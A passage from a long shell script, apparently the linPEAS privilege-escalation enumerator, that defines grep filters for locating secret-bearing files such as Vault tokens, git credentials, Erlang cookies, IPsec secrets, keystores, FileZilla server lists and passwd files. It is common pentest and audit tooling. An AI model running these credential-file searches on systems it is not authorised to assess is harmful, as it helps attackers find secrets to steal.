"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "grafana\.ini$" | sort | uniq | head -n 70) PSTORAGE_KNOCKD=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E '/etc/init.d/' | grep -E "^${ROOT_FOLDER}etc" | grep -E ".*knockd.*$"
| sort | uniq | head -n 70) PSTORAGE_LOGSTASH=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "logstash$" | sort | uniq | head -n 70) PSTORAGE_ELASTICSEARCH=$(echo
-e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70)
PSTORAGE_VAULT_SSH_HELPER=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70)
PSTORAGE_VAULT_SSH_TOKEN=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.vault-token$" | sort | uniq | head -n 70) PSTORAGE_COUCHDB=$(echo
-e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "couchdb$" | sort | uniq | head -n 70) PSTORAGE_REDIS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "redis\.conf$" | sort | uniq | head -n 70) PSTORAGE_MOSQUITTO=$(echo
-e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) PSTORAGE_NEO4J=$(echo
-e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "neo4j$" | sort | uniq | head -n 70) PSTORAGE_CLOUD_INIT=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "cloud\.cfg$" | sort | uniq | head -n 70) PSTORAGE_ERLANG=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) PSTORAGE_SIP=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "sip\.conf$|amportal\.conf$|FreePBX\.conf$|Elastix\.conf$" | sort |
uniq | head -n 70) PSTORAGE_GMV_AUTH=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) PSTORAGE_IPSEC=$(echo
-e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70)
PSTORAGE_IRSSI=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.irssi$" | sort | uniq | head -n 70) PSTORAGE_KEYRING=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head
-n 70) PSTORAGE_VIRTUAL_DISKS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E ".*\.vhd$|.*\.vhdx$|.*\.vmdk$" | sort | uniq | head -n 70)
PSTORAGE_FILEZILLA=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head
-n 70) PSTORAGE_BACKUP_MANAGER=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70)
PSTORAGE_SPLUNK=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "passwd$" | sort | uniq | head -n 70) PSTORAGE_GIT=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.git-credentials$" | sort | uniq | head -n 70)
PSTORAGE_ATLANTIS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "atlantis\.db$" | sort | uniq | head -n 70) PSTORAGE_GITLAB=$(echo -e
